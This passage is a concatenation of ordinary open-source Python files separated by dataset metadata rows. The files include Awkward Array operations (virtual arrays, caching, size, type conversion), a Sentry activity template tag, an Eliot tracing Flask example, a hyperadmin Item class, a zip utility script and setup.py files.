    operation that needs the actual data values still materializes it. Fields
    of a record array may individually be virtual, so that only the fields a
    query touches get read. (When combining virtual fields with #ak.zip, pass
    `depth_limit=1` to avoid materializing them during broadcasting.)
    Functions with a `lazy` option, such as #ak.from_parquet and
    #ak.from_buffers, construct #ak.layout.RecordArray of
    #ak.layout.VirtualArray in this way.
    See also #ak.materialized.
    """
    # A bare primitive name is not valid JSON by itself; quote it so that it
    # parses as the JSON form '"float64"', etc.
    primitive_names = (
        "float64",
        "float32",
        "int64",
        "uint64",
        "int32",
        "uint32",
        "int16",
        "uint16",
        "int8",
        "uint8",
        "bool",
    )
    if isinstance(form, str) and form in primitive_names:
        form = ak.forms.Form.fromjson('"' + form + '"')
    elif isinstance(form, (str, bytes)) or (
        ak._util.py27 and isinstance(form, ak._util.unicode)
    ):
        # Already a JSON-encoded Form description.
        form = ak.forms.Form.fromjson(form)
    elif form is not None and not isinstance(form, ak.forms.Form):
        # JSON-like dict: serialize it, then parse as a Form.
        form = ak.forms.Form.fromjson(json.dumps(form))
    generator = ak.layout.ArrayGenerator(
        generate, args, kwargs or {}, form=form, length=length
    )
    # Normalize `cache` into an ArrayCache (or leave it as None).
    if cache == "new":
        cache = ak.layout.ArrayCache(ak._util.MappingProxy({}))
    elif cache is not None and not isinstance(cache, ak.layout.ArrayCache):
        cache = ak.layout.ArrayCache(ak._util.MappingProxy.maybe_wrap(cache))
    out = ak.layout.VirtualArray(
        generator, cache, cache_key=cache_key, parameters=parameters
    )
    return ak._util.maybe_wrap(out, behavior, highlevel)
def materialized(array, highlevel=True, behavior=None):
    """
    Args:
        array: The possibly virtual array to ensure is materialized.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns `array` with every nested #ak.layout.VirtualArray node replaced
    by its fully generated (materialized) contents.
    See also #ak.virtual.
    """
    def _replace_virtual(node):
        # Non-virtual nodes return None so recursively_apply descends into
        # their children unchanged.
        if not isinstance(node, ak.layout.VirtualArray):
            return None
        # Recurse in case the generated array itself contains virtual nodes.
        generated = materialized(node.array, highlevel=False)
        return lambda: generated
    out = ak._util.recursively_apply(
        ak.operations.convert.to_layout(array),
        _replace_virtual,
        pass_depth=False,
        pass_user=False,
    )
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def with_cache(array, cache, highlevel=True, behavior=None):
    """
    Args:
        array: Data to search for nested virtual arrays.
        cache (None, "new", or MutableMapping): If None, each nested virtual
            array keeps the cache it already has; if "new", a new dict
            (keep-forever cache) is created; otherwise, generated arrays are
            stored in the given mapping with `__setitem__`, retrieved with
            `__getitem__`, and only re-generated if `__getitem__` raises a
            `KeyError`. This mapping may evict elements according to any
            caching algorithm (LRU, LFR, RR, TTL, etc.).
        highlevel (bool): Must be True (see below).
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns an array in which every nested virtual array uses `cache`.
    For example:
        >>> cache1 = {}
        >>> one = ak.virtual(lambda: [[1.1, 2.2, 3.3], [], [4.4, 5.5]], cache=cache1, length=3)
        >>> two = ak.virtual(lambda: [100, 200, 300], cache=cache1, length=3)
        >>> array1 = ak.zip({"x": one, "y": two}, depth_limit=1)
        >>> cache2 = {}
        >>> array2 = ak.with_cache(array1, cache2)
        >>> array2["x"]
        <Array [[1.1, 2.2, 3.3], [], [4.4, 5.5]] type='3 * var * float64'>
        >>> len(cache1), len(cache2)
        (0, 1)
    Viewing `array2["x"]` filled `cache2` and not `cache1`.
    See #ak.virtual.
    """
    # VirtualArrays only hold weak references to caches; the ak.Array wrapper
    # produced by highlevel=True is what keeps the new cache alive.
    if not highlevel:
        raise NotImplementedError(
            "ak.with_cache cannot allow highlevel=False because the only strong references\n"
            "to caches are held by ak.Array objects; VirtualArrays only hold weak references,\n"
            "which would go out of scope with this function. This will be fixed in Awkward 2.0,\n"
            "when VirtualArrays are reimplemented in Python and can safely hold strong\n"
            "references to caches.\n\n"
            "For now, use highlevel=True and extract the layout from the output array."
        )
    # Normalize `cache` into an ArrayCache (or leave it as None).
    if cache == "new":
        cache = ak.layout.ArrayCache(ak._util.MappingProxy({}))
    elif cache is not None and not isinstance(cache, ak.layout.ArrayCache):
        cache = ak.layout.ArrayCache(ak._util.MappingProxy.maybe_wrap(cache))
    def _swap_cache(node):
        if not isinstance(node, ak.layout.VirtualArray):
            return None
        replacement = node.cache if cache is None else cache
        return lambda: ak.layout.VirtualArray(
            node.generator,
            replacement,
            node.cache_key,
            node.identities,
            node.parameters,
        )
    out = ak._util.recursively_apply(
        ak.operations.convert.to_layout(array), _swap_cache, pass_depth=False
    )
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("size")
def size(array, axis=None):
    """
    Args:
        array: Rectilinear array whose `shape` needs to be known.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
    Returns an int or a list of ints, one for each regular dimension.
    Implements NumPy's
    [size](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ma.size.html)
    function in a way that accepts #ak.Array as the `array`.
    If the `array` is not rectilinear (i.e. if #ak.to_numpy would raise an
    error), then this function raises an error.
    """
    if axis is not None and axis < 0:
        raise NotImplementedError(
            "ak.size with axis < 0" + ak._util.exception_suffix(__file__)
        )
    # Walks the layout tree, appending one entry per dimension to `sizes`:
    # an int for fixed-size (regular) dimensions, None for variable-length
    # ones.
    def recurse(layout, axis, sizes):
        nplike = ak.nplike.of(layout)
        if isinstance(layout, ak._util.virtualtypes):
            # `.array` triggers generation of the virtual array's contents.
            recurse(layout.array, axis, sizes)
        elif isinstance(layout, ak._util.unknowntypes):
            pass
        elif isinstance(layout, ak._util.indexedtypes):
            recurse(layout.content, axis, sizes)
        elif isinstance(layout, ak._util.uniontypes):
            # Every union branch must agree on its sizes, or the result would
            # be ambiguous.
            compare = None
            for x in layout.contents:
                inner = []
                recurse(x, axis, inner)
                if compare is None:
                    compare = inner
                elif compare != inner:
                    raise ValueError(
                        "ak.size is ambiguous due to union of different "
                        "sizes" + ak._util.exception_suffix(__file__)
                    )
            sizes.extend(compare)
        elif isinstance(layout, ak._util.optiontypes):
            return recurse(layout.content, axis, sizes)
        elif isinstance(layout, ak._util.listtypes):
            # Only RegularArray has a known, fixed size per element; other
            # list types are variable-length, recorded as None.
            if isinstance(layout, ak.layout.RegularArray):
                sizes.append(layout.size)
            else:
                sizes.append(None)
            if axis is None:
                recurse(layout.content, axis, sizes)
            elif axis > 0:
                recurse(layout.content, axis - 1, sizes)
        elif isinstance(layout, ak._util.recordtypes):
            # Like unions: every record field must agree on its sizes.
            compare = None
            for x in layout.contents:
                inner = []
                recurse(x, axis, inner)
                if compare is None:
                    compare = inner
                elif compare != inner:
                    raise ValueError(
                        "ak.size is ambiguous due to record of different "
                        "sizes" + ak._util.exception_suffix(__file__)
                    )
            sizes.extend(compare)
        elif isinstance(layout, ak.layout.NumpyArray):
            # Leaf node: the NumPy shape beyond its first axis supplies the
            # remaining (regular) dimensions.
            if axis is None:
                sizes.extend(nplike.asarray(layout).shape[1:])
            else:
                sizes.extend(nplike.asarray(layout).shape[1 : axis + 2])
        else:
            raise AssertionError(
                "unrecognized Content type" + ak._util.exception_suffix(__file__)
            )
    layout = ak.operations.convert.to_layout(array, allow_record=False)
    if isinstance(layout, ak.partition.PartitionedArray):
        layout = layout.toContent()
    # Wrap in a length-1 RegularArray so the array's own length is counted
    # as the first dimension.
    layout = ak.layout.RegularArray(layout, len(layout), 1)
    sizes = []
    recurse(layout, axis, sizes)
    if axis is None:
        # Total size: the product of all dimensions, all of which must be
        # regular.
        out = 1
        for size in sizes:
            if size is None:
                raise ValueError(
                    "ak.size is ambiguous due to variable-length arrays "
                    "(try ak.flatten to remove structure or ak.to_numpy "
                    "to force regularity, if possible)"
                    + ak._util.exception_suffix(__file__)
                )
            else:
                out *= size
        return out
    else:
        # Size of one particular dimension: the last entry collected during
        # the walk down to `axis`.
        if sizes[-1] is None:
            raise ValueError(
                "ak.size is ambiguous due to variable-length arrays at "
                "axis {0} (try ak.flatten to remove structure or "
                "ak.to_numpy to force regularity, if possible)".format(axis)
                + ak._util.exception_suffix(__file__)
            )
        else:
            return sizes[-1]
@ak._connect._numpy.implements("atleast_1d")
def atleast_1d(*arrays):
    """
    Args:
        arrays: Rectilinear arrays to be converted to NumPy arrays of at
            least 1 dimension.
    Implements NumPy's
    [atleast_1d](https://docs.scipy.org/doc/numpy/reference/generated/numpy.atleast_1d.html)
    function in a way that accepts #ak.Array objects as the `arrays`.
    If the `arrays` are not all rectilinear (i.e. if #ak.to_numpy would raise
    an error), then this function raises an error.
    Note: this function returns a NumPy array, not an Awkward Array.
    """
    # Each array is converted to NumPy first; to_numpy raises for
    # non-rectilinear data, which is what this function's error contract
    # relies on.
    nplike = ak.nplike.of(*arrays)
    return nplike.atleast_1d(*[ak.operations.convert.to_numpy(x) for x in arrays])
@ak._connect._numpy.implements("nan_to_num")
def nan_to_num(
    array, copy=True, nan=0.0, posinf=None, neginf=None, highlevel=True, behavior=None
):
    """
    Args:
        array: Array whose `NaN` values should be converted to a number.
        copy (bool): Ignored (Awkward Arrays are immutable).
        nan (int or float): Value used to replace `NaN` values.
        posinf (int, float, or None): Value used to replace positive
            infinity; if None, positive infinities are replaced with a very
            large number.
        neginf (int, float, or None): Value used to replace negative
            infinity; if None, negative infinities are replaced with a very
            small number.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Implements [np.nan_to_num](https://numpy.org/doc/stable/reference/generated/numpy.nan_to_num.html)
    for Awkward Arrays.
    """
    layout = ak.operations.convert.to_layout(array)
    nplike = ak.nplike.of(layout)
    def _fill_numeric(node):
        # Only numeric leaf nodes are rewritten; structural nodes are left
        # for recursively_apply to descend into.
        if not isinstance(node, ak.layout.NumpyArray):
            return None
        return lambda: ak.layout.NumpyArray(
            nplike.nan_to_num(
                nplike.asarray(node), nan=nan, posinf=posinf, neginf=neginf
            )
        )
    out = ak._util.recursively_apply(
        layout, _fill_numeric, pass_depth=False, pass_user=False
    )
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
@ak._connect._numpy.implements("isclose")
def isclose(
    a, b, rtol=1e-05, atol=1e-08, equal_nan=False, highlevel=True, behavior=None
):
    """
    Args:
        a: First array to compare.
        b: Second array to compare.
        rtol (float): The relative tolerance parameter.
        atol (float): The absolute tolerance parameter.
        equal_nan (bool): If True, `NaN` values in `a` are considered equal
            to `NaN` values in `b`.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Implements [np.isclose](https://numpy.org/doc/stable/reference/generated/numpy.isclose.html)
    for Awkward Arrays.
    """
    one = ak.operations.convert.to_layout(a)
    two = ak.operations.convert.to_layout(b)
    nplike = ak.nplike.of(one, two)
    def _pairwise(inputs):
        left, right = inputs[0], inputs[1]
        # Only act once both sides have been broadcast down to numeric
        # leaves; otherwise let broadcast_and_apply keep descending.
        if not (
            isinstance(left, ak.layout.NumpyArray)
            and isinstance(right, ak.layout.NumpyArray)
        ):
            return None
        return lambda: (
            ak.layout.NumpyArray(
                nplike.isclose(
                    nplike.asarray(left),
                    nplike.asarray(right),
                    rtol=rtol,
                    atol=atol,
                    equal_nan=equal_nan,
                )
            ),
        )
    behavior = ak._util.behaviorof(one, two, behavior=behavior)
    out = ak._util.broadcast_and_apply(
        [one, two], _pairwise, behavior, pass_depth=False
    )
    assert isinstance(out, tuple) and len(out) == 1
    return ak._util.maybe_wrap(out[0], behavior, highlevel)
_dtype_to_string = {
np.dtype(np.bool_): "bool",
np.dtype(np.int8): "int8",
np.dtype(np.int16): "int16",
np.dtype(np.int32): "int32",
np.dtype(np.int64): "int64",
np.dtype(np.uint8): "uint8",
np.dtype(np.uint16): "uint16",
np.dtype(np.uint32): "uint32",
np.dtype(np.uint64): "uint64",
np.dtype(np.float32): "float32",
np.dtype(np.float64): "float64",
np.dtype(np.complex64): "complex64",
np.dtype(np.complex128): "complex128",
np.dtype(np.datetime64): "datetime64",
np.dtype(np.timedelta64): "timedelta64",
}
if hasattr(np, "float16"):
_dtype_to_string[np.dtype(np.float16)] = "float16"
if hasattr(np, "float128"):
_dtype_to_string[np.dtype(np.float128)] = "float128"
if hasattr(np, "complex256"):
_dtype_to_string[np.dtype(np.complex256)] = "complex256"
def values_astype(array, to, highlevel=True, behavior=None):
    """
    Args:
        array: Array whose numbers should be converted to a new numeric type.
        to (dtype or dtype specifier): Type to convert the numbers into.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Converts all numbers in the array to a new type, leaving the structure
    untouched. For example,
        >>> array = ak.Array([[1.1, 2.2, 3.3], [], [4.4, 5.5]])
        >>> ak.values_astype(array, np.int32)
        <Array [[1, 2, 3], [], [4, 5]] type='3 * var * int32'>
    When converting to a unitless `np.datetime64`, a default `[us]` unit is
    assumed; a unit may be given explicitly, e.g. `"datetime64[ms]"` or
    `np.dtype("M8[ms]")`:
        >>> ak.values_astype(ak.Array([1567416600000]), "datetime64[ms]")
        <Array [2019-09-02T09:30:00.000] type='1 * datetime64'>
    See also #ak.strings_astype.
    """
    target = np.dtype(to)
    type_name = _dtype_to_string.get(target)
    if type_name is None:
        # Unit-qualified datetimes (e.g. "datetime64[ms]") are not in the
        # lookup table, but their dtype names are accepted directly.
        if not target.name.startswith("datetime64"):
            raise ValueError(
                "cannot use {0} to cast the numeric type of an array".format(target)
                + ak._util.exception_suffix(__file__)
            )
        type_name = target.name
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    return ak._util.maybe_wrap_like(
        layout.numbers_to_type(type_name), array, behavior, highlevel
    )
def strings_astype(array, to, highlevel=True, behavior=None):
    """
    Args:
        array: Array whose strings should be converted to a new numeric type.
        to (dtype or dtype specifier): Type to convert the strings into.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Converts all strings in the array to a new type, leaving the structure
    untouched.
    For example,
    >>> array = ak.Array(["1", "2", " 3 ", "00004", "-5"])
    >>> ak.strings_astype(array, np.int32)
    <Array [1, 2, 3, 4, -5] type='5 * int32'>
    and
    >>> array = ak.Array(["1.1", "2.2", " 3.3 ", "00004.4", "-5.5"])
    >>> ak.strings_astype(array, np.float64)
    <Array [1.1, 2.2, 3.3, 4.4, -5.5] type='5 * float64'>
    and finally,
    >>> array = ak.Array([["1.1", "2.2", " 3.3 "], [], ["00004.4", "-5.5"]])
    >>> ak.strings_astype(array, np.float64)
    <Array [[1.1, 2.2, 3.3], [], [4.4, -5.5]] type='3 * var * float64'>
    See also #ak.values_astype.
    """
    to_dtype = np.dtype(to)
    def getfunction(layout):
        # Only act on list-of-char nodes tagged as (byte)strings; all other
        # nodes are left for recursively_apply to descend into.
        if isinstance(layout, ak._util.listtypes) and (
            layout.parameter("__array__") == "string"
            or layout.parameter("__array__") == "bytestring"
        ):
            layout = without_parameters(layout, highlevel=False)
            # Pad every string to the same length so the whole column can be
            # viewed as one fixed-width NumPy string array.
            max_length = ak.max(num(layout))
            regulararray = layout.rpad_and_clip(max_length, 1)
            maskedarray = ak.operations.convert.to_numpy(
                regulararray, allow_missing=True
            )
            npstrings = maskedarray.data
            # Zero out the padded (masked) characters before reinterpreting,
            # so they act as NUL terminators in the fixed-width view.
            if maskedarray.mask is not False:
                npstrings[maskedarray.mask] = 0
            npnumbers = (
                npstrings.reshape(-1).view("<S" + str(max_length)).astype(to_dtype)
            )
            return lambda: ak.layout.NumpyArray(npnumbers)
        else:
            return None
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    out = ak._util.recursively_apply(
        layout,
        getfunction,
        pass_depth=False,
        pass_user=False,
    )
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
__all__ = [
x
for x in list(globals())
if not x.startswith("_")
and x
not in (
"numbers",
"json",
"Iterable",
"ak",
"np",
)
]
def __dir__():
    # Limit dir(<module>) to the curated public API above.
    return __all__
| 37.965332 | 171 | 0.563147 |
177b945f6c31a58db26b518fb5c945f6ea0e37c1 | 91 | py | Python | tests/__init__.py | alan-augustine/python_singly_linkedlist | f227a4154b22de8a273d319ecdd6329035d5d258 | [
"MIT"
] | null | null | null | tests/__init__.py | alan-augustine/python_singly_linkedlist | f227a4154b22de8a273d319ecdd6329035d5d258 | [
"MIT"
] | null | null | null | tests/__init__.py | alan-augustine/python_singly_linkedlist | f227a4154b22de8a273d319ecdd6329035d5d258 | [
"MIT"
] | null | null | null | import sys
import os
# Make the sibling ``src`` directory importable when the tests run from here.
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'src'))
| 22.75 | 69 | 0.703297 |
55e4f3d091ceb77435c5de14d61f03695962eedb | 398 | py | Python | geoserver/zip_files.py | rileyhales/dataTools | 86b32ecb47388a7c9fda8b45972fadaac132dffb | [
"BSD-3-Clause"
] | 2 | 2019-12-29T19:58:38.000Z | 2021-12-17T09:16:24.000Z | geoserver/zip_files.py | rileyhales/dataTools | 86b32ecb47388a7c9fda8b45972fadaac132dffb | [
"BSD-3-Clause"
] | null | null | null | geoserver/zip_files.py | rileyhales/dataTools | 86b32ecb47388a7c9fda8b45972fadaac132dffb | [
"BSD-3-Clause"
] | 1 | 2021-12-17T06:36:12.000Z | 2021-12-17T06:36:12.000Z | import zipfile, os
# Bundle every file in the admin workspace directory into one zip archive.
path = '/Users/rileyhales/tethys/apps/gldas/tethysapp/gldas/workspaces/user_workspaces/admin'
files = os.listdir(path)  # reuse `path` instead of repeating the literal
# The context manager finalizes and closes the archive even if a write fails
# (the original left the archive open when an exception was raised).
with zipfile.ZipFile('/Users/rileyhales/hydroinformatics/admin.zip', mode='w') as archive:
    for file in files:
        archive.write(os.path.join(path, file), arcname=file)
| 44.222222 | 106 | 0.786432 |
5a244d0ac92cb8613f26722ad8d231dfa6688b4c | 1,908 | py | Python | src/sentry/templatetags/sentry_activity.py | dolfly/sentry | 67ca39d5a639b70e54e8519f08533ab51431406a | [
"BSD-3-Clause"
] | null | null | null | src/sentry/templatetags/sentry_activity.py | dolfly/sentry | 67ca39d5a639b70e54e8519f08533ab51431406a | [
"BSD-3-Clause"
] | null | null | null | src/sentry/templatetags/sentry_activity.py | dolfly/sentry | 67ca39d5a639b70e54e8519f08533ab51431406a | [
"BSD-3-Clause"
] | null | null | null | """
sentry.templatetags.sentry_activity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from django import template
from django.utils.html import escape, linebreaks
from django.utils.safestring import mark_safe
from sentry.models import Activity
from sentry.templatetags.sentry_helpers import timesince
from sentry.utils.avatar import get_gravatar_url
register = template.Library()

# Maps Activity.type constants to the text/HTML fragment describing the
# action.  The CREATE_ISSUE entry is a str.format template whose fields are
# filled in from Activity.data at render time.
ACTIVITY_ACTION_STRINGS = {
    Activity.NOTE: 'left a comment',
    Activity.SET_RESOLVED: 'marked this event as resolved',
    Activity.SET_UNRESOLVED: 'marked this event as unresolved',
    Activity.SET_MUTED: 'marked this event as muted',
    Activity.SET_PUBLIC: 'made this event public',
    Activity.SET_PRIVATE: 'made this event private',
    Activity.SET_REGRESSION: 'marked this event as a regression',
    Activity.CREATE_ISSUE: u'created an issue on {provider:s} titled <a href="{location:s}">{title:s}</a>',
}
@register.filter
def render_activity(item):
    """Render an Activity record as a safe HTML snippet: avatar, actor name,
    action description, timestamp, and (for notes) the comment body."""
    if not item.group:
        # not implemented
        return

    action_str = ACTIVITY_ACTION_STRINGS[item.type]
    if item.type == Activity.CREATE_ISSUE:
        # item.data comes from an external issue provider; escape each value
        # before interpolating it into markup that is later mark_safe'd,
        # otherwise a hostile issue title/location could inject HTML (XSS).
        action_str = action_str.format(
            **{key: escape(value) for key, value in item.data.items()}
        )

    output = ''

    if item.user:
        user = item.user
        name = user.first_name or user.email
        output += '<span class="avatar"><img src="%s"></span> ' % (get_gravatar_url(user.email, size=20),)
        output += '<strong>%s</strong> %s' % (escape(name), action_str)
    else:
        output += '<span class="avatar sentry"></span> '
        output += 'The system %s' % (action_str,)

    output += ' <span class="sep">—</span> <span class="time">%s</span>' % (timesince(item.datetime),)

    if item.type == Activity.NOTE:
        # Escape the user-supplied note body before linebreaks() wraps it in
        # <p>/<br> markup; linebreaks() itself does not escape its input here.
        output += linebreaks(escape(item.data['body']))

    return mark_safe(output)
| 32.338983 | 108 | 0.675052 |
746ff7a531d3796325de0983381e8018d0a26abb | 711 | py | Python | examples/cross_process_server.py | thedrow/eliot | 7a5815c54e4b89fb0cb3feeefecdc2482e953fd9 | [
"Apache-2.0"
] | 598 | 2018-09-27T12:34:08.000Z | 2022-03-17T04:15:15.000Z | examples/cross_process_server.py | thedrow/eliot | 7a5815c54e4b89fb0cb3feeefecdc2482e953fd9 | [
"Apache-2.0"
] | 136 | 2018-10-03T16:53:29.000Z | 2022-01-11T09:32:58.000Z | examples/cross_process_server.py | thedrow/eliot | 7a5815c54e4b89fb0cb3feeefecdc2482e953fd9 | [
"Apache-2.0"
] | 39 | 2018-10-09T02:20:27.000Z | 2022-03-30T09:22:16.000Z | """
Cross-process log tracing: HTTP server.
"""
from __future__ import unicode_literals
import sys
from flask import Flask, request
from eliot import to_file, Action, start_action, add_global_fields
# Tag every Eliot message with this process name and stream the JSON log
# records to stdout so they can be correlated with the client's trace.
add_global_fields(process="server")
to_file(sys.stdout)

app = Flask("server")
def divide(x, y):
    """Divide *x* by *y* inside a traced Eliot action and log the result."""
    with start_action(action_type="divide", x=x, y=y) as act:
        quotient = x / y
        act.add_success_fields(result=quotient)
        return quotient
@app.route("/")
def main():
    # Resume the Eliot task started by the client (task id arrives in a
    # request header) so server-side actions appear inside the caller's
    # cross-process trace.
    with Action.continue_task(task_id=request.headers["x-eliot-task-id"]):
        x = int(request.args["x"])
        y = int(request.args["y"])
        return str(divide(x, y))

if __name__ == '__main__':
    app.run()
| 20.911765 | 74 | 0.670886 |
789d384696f5e732ba82bcd5d7147de7be535031 | 814 | py | Python | setup.py | CI1100/HW_10 | 9aaa65ff54b7daadbef3cf1420ca0815435f706f | [
"MIT"
] | null | null | null | setup.py | CI1100/HW_10 | 9aaa65ff54b7daadbef3cf1420ca0815435f706f | [
"MIT"
] | null | null | null | setup.py | CI1100/HW_10 | 9aaa65ff54b7daadbef3cf1420ca0815435f706f | [
"MIT"
] | null | null | null | from distutils.core import setup
# Read the README once so PyPI can render it as the long description.
# Passing an explicit encoding avoids platform-dependent default decoding
# (the original relied on the locale encoding).
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setup(
    name="HW_10",  # Replace with your own username
    version="0.1.0",
    author="Olga",
    author_email="Olga@example.com",
    description="Creation of packages for projects HW8 and HW9",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/CI1100/HW_10",
    license= 'LICENSE.txt',
    packages= ['final_project_packages', 'final_project_packages.test'],
    scripts = ['bin/HW_8.py', 'bin/kmeans_iris.py'],
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
)
| 32.56 | 73 | 0.641278 |
423422d7703d8da2cb87c837c08a4c6d60bcb680 | 2,165 | py | Python | hyperadmin/hyperobjects.py | zbyte64/django-hyperadmin | 9ac2ae284b76efb3c50a1c2899f383a27154cb54 | [
"BSD-3-Clause"
] | 25 | 2015-01-26T11:37:22.000Z | 2021-04-05T17:21:05.000Z | hyperadmin/hyperobjects.py | zbyte64/django-hyperadmin | 9ac2ae284b76efb3c50a1c2899f383a27154cb54 | [
"BSD-3-Clause"
] | 1 | 2015-04-13T04:19:49.000Z | 2015-04-13T04:19:49.000Z | hyperadmin/hyperobjects.py | zbyte64/django-hyperadmin | 9ac2ae284b76efb3c50a1c2899f383a27154cb54 | [
"BSD-3-Clause"
] | 2 | 2017-05-24T13:33:17.000Z | 2019-11-14T06:24:48.000Z | '''
These are objects generated by the resource and are serialized by a media type.
'''
from hyperadmin.links import LinkCollectorMixin, ItemLinkCollectionProvider, LinkNotAvailable
class Item(LinkCollectorMixin):
    '''
    Represents an instance that is bound to an endpoint.

    Nearly every method delegates to the owning endpoint, which supplies
    URLs, forms, prompts, namespaces, and links for the wrapped instance.
    '''
    # Optional per-item form override; falls back to the endpoint's form class.
    form_class = None
    link_collector_class = ItemLinkCollectionProvider

    def __init__(self, endpoint, instance, datatap=None):
        self.endpoint = endpoint
        self.instance = instance
        self.links = self.get_link_collector()
        self.datatap = datatap

    @property
    def state(self):
        # Shared state lives on the endpoint, not the item.
        return self.endpoint.state

    def get_absolute_url(self):
        # Ask the endpoint for this item's URL; an unavailable link yields ''.
        try:
            return self.endpoint.get_item_url(self)
        except LinkNotAvailable:
            return '' #or do we return None?

    def get_form_class(self):
        # Per-item override wins over the endpoint's default form class.
        if self.form_class is not None:
            return self.form_class
        return self.endpoint.get_item_form_class()

    def get_form_kwargs(self, **kwargs):
        # Inject this item into the kwargs, then let the endpoint finish them.
        kwargs['item'] = self
        return self.endpoint.get_item_form_kwargs(**kwargs)

    def get_form(self, **form_kwargs):
        # Build a fresh form instance bound to this item.
        form_cls = self.get_form_class()
        kwargs = self.get_form_kwargs(**form_kwargs)
        form = form_cls(**kwargs)
        return form

    @property
    def form(self):
        """
        Mediatype uses this form to serialize the result.
        Lazily created and cached on first access.
        """
        if not hasattr(self, '_form'):
            self._form = self.get_form()
        return self._form

    def get_prompt(self):
        """
        Returns a string representing the item
        """
        return self.endpoint.get_item_prompt(self)

    def get_resource_items(self):
        # An item is its own (single-element) resource-item collection.
        return [self]

    def get_namespaces(self):
        """
        Returns namespaces associated with this item
        """
        return self.endpoint.get_item_namespaces(item=self)

    def get_link(self, **kwargs):
        return self.endpoint.get_item_link(item=self, **kwargs)

    def get_outbound_link(self, **kwargs):
        # Outbound links default to link factor 'LO' unless told otherwise.
        kwargs.setdefault('link_factor', 'LO')
        return self.get_link(**kwargs)
| 28.486842 | 93 | 0.626328 |
b80b18c4fcb6fc7a2080cbd4eaf0f8b982cedea3 | 2,642 | py | Python | setup.py | sammchardy/python-idex | 24cee970172491a7f7d5f52558727a77384cce26 | [
"MIT"
] | 86 | 2017-11-15T18:49:50.000Z | 2022-02-01T19:37:29.000Z | setup.py | sammchardy/python-idex | 24cee970172491a7f7d5f52558727a77384cce26 | [
"MIT"
] | 42 | 2018-01-05T02:35:08.000Z | 2020-04-16T13:56:45.000Z | setup.py | sammchardy/python-idex | 24cee970172491a7f7d5f52558727a77384cce26 | [
"MIT"
] | 59 | 2017-12-10T17:22:48.000Z | 2022-02-01T19:37:31.000Z | #!/usr/bin/env python
import codecs
import os
import re
import sys
from setuptools import setup
here = os.path.abspath(os.path.dirname(__file__))
def find_packages():
    """adapted from IPython's setupbase.find_packages()

    Walk the ``idex`` tree and return every directory that contains an
    ``__init__.py``, expressed in dotted package notation.
    """
    found = []
    for dirpath, _subdirs, filenames in os.walk('idex'):
        if '__init__.py' not in filenames:
            # not a package
            continue
        pkg = dirpath.replace(os.path.sep, '.')
        # Skip asyncio sub-packages on pre-3.3 interpreters (except when
        # building an sdist): tools like compileall/pytest choke on
        # Python-3-only sources even if they are never imported.
        skip_asyncio = (
            sys.version_info < (3, 3)
            and 'asyncio' in pkg
            and 'sdist' not in sys.argv
        )
        if skip_asyncio:
            continue
        found.append(pkg)
    return found
def read(*parts):
    # Read a file located relative to this setup script's directory (`here`).
    # NOTE(review): no encoding is passed, so codecs.open falls back to the
    # platform default decoding -- confirm the read files are ASCII-safe.
    with codecs.open(os.path.join(here, *parts), 'r') as fp:
        return fp.read()
def find_version(*file_paths):
    """Extract the ``__version__ = '...'`` string from the given file."""
    contents = read(*file_paths)
    match = re.search(
        r"^__version__ = ['\"]([^'\"]*)['\"]", contents, re.M
    )
    if match is None:
        raise RuntimeError("Unable to find version string.")
    return match.group(1)
def install_requires():
    """Assemble the dependency list, pinning older versions on Python < 3.3."""
    deps = ['requests', 'coincurve>=7.0.0', 'pycryptodome>=3.5.1,<4']
    if sys.version_info > (3, 3):
        deps += ['py_ecc', 'websockets>=4.0.0', 'aiohttp>=2.3.0', 'shortid>=0.1.2', 'rlp>=0.6']
    else:
        deps += ['py_ecc==1.4.2', 'rlp==0.4.7']
    print("installing:{}".format(deps))
    return deps
# Distribution metadata for python-idex; version is read from idex/__init__.py
# and the dependency list is computed per interpreter version above.
setup(
    name='python-idex',
    version=find_version("idex", "__init__.py"),
    packages=find_packages(),
    description='IDEX REST API python implementation',
    long_description=read('README.rst'),
    url='https://github.com/sammchardy/python-idex',
    author='Sam McHardy',
    license='MIT',
    author_email='',
    install_requires=install_requires(),
    keywords='idex exchange rest api ethereum eth eos',
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
)
| 33.025 | 104 | 0.608251 |
